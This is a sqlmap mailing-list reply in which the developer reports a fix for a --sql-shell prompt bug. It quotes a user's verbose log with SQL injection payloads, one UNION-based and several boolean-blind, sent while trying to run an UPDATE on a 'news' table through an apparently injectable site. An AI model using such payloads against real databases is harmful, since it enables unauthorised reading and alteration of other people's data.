Re: [sqlmap-users] When using '--sql-shell' for running UPDATE query this is what I see with -v 3
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] When using '--sql-shell' for running UPDATE query this is what I see with -v 3
|
From: Miroslav S. <mir...@gm...> - 2011-07-30 21:43:06
|
hi. here was a problem in programs logic that needed to be changed. with the last commit there won't be anymore questions like "do you want to retrieve..." for --sql-shell/--sql-query. this was causing problems (program did nothing) for non-compatible answers (N for queries and Y for non-queries). to make things short, there was a program logic bug that should be fixed now with r4307. kr On Sat, Jul 30, 2011 at 6:52 PM, Liran Mimoni <rea...@gm...> wrote: > sql-shell> update news set title = "dasdasd"; > do you want to retrieve the SQL statement output? [y/N/a] y > [19:50:14] [INFO] fetching SQL data manipulation query output: 'update news > set title = "dasdasd";' > [19:50:14] [PAYLOAD] -1868 UNION ALL SELECT NULL, NULL, NULL, > CONCAT(CHAR(58,111,100,99,58),IFNULL(UPDATE news set title = > "dasdasd";,CHAR(32)),CHAR(58,100,117,121,58)), NULL, NULL# > [19:50:15] [WARNING] if the problem persists with 'None' values please try > to use hidden switch --no-cast (fixing problems with some collation issues) > [19:50:15] [DEBUG] performed 1 queries in 0 seconds > [19:50:15] [PAYLOAD] -3449 > [19:50:16] [INFO] retrieving the length of query output > [19:50:16] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(LENGTH(UPDATE news set > title = "dasdasd";),CHAR(32))),1,1)) > 51) > [19:50:16] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(LENGTH(UPDATE news set > title = "dasdasd";),CHAR(32))),1,1)) > 48) > [19:50:16] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(LENGTH(UPDATE news set > title = "dasdasd";),CHAR(32))),1,1)) > 1) > [19:50:17] [INFO] retrieved: > [19:50:17] [DEBUG] performed 3 queries in 1 seconds > [19:50:17] [DEBUG] starting 50 threads > [19:50:17] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title = > "dasdasd";,CHAR(32))),1,1)) > 64) > [19:50:17] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title = > "dasdasd";,CHAR(32))),1,1)) > 32) > [19:50:17] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title = > "dasdasd";,CHAR(32))),1,1)) > 16) > [19:50:18] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title = > "dasdasd";,CHAR(32))),1,1)) > 8) > [19:50:18] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title = > "dasdasd";,CHAR(32))),1,1)) > 4) > [19:50:18] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title = > "dasdasd";,CHAR(32))),1,1)) > 2) > [19:50:18] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title = > "dasdasd";,CHAR(32))),1,1)) > 1) > [19:50:19] [INFO] retrieved: > [19:50:19] [DEBUG] performed 7 queries in 3 seconds > > the update command didnt work, it didnt updated the requested column > Please help me thanks > ------------------------------------------------------------------------------ > Got Input? Slashdot Needs You. > Take our quick survey online. Come on, we don't ask for help often. > Plus, you'll get a chance to win $100 to spend on ThinkGeek. > http://p.sf.net/sfu/slashdot-survey > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar (@stamparm) E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
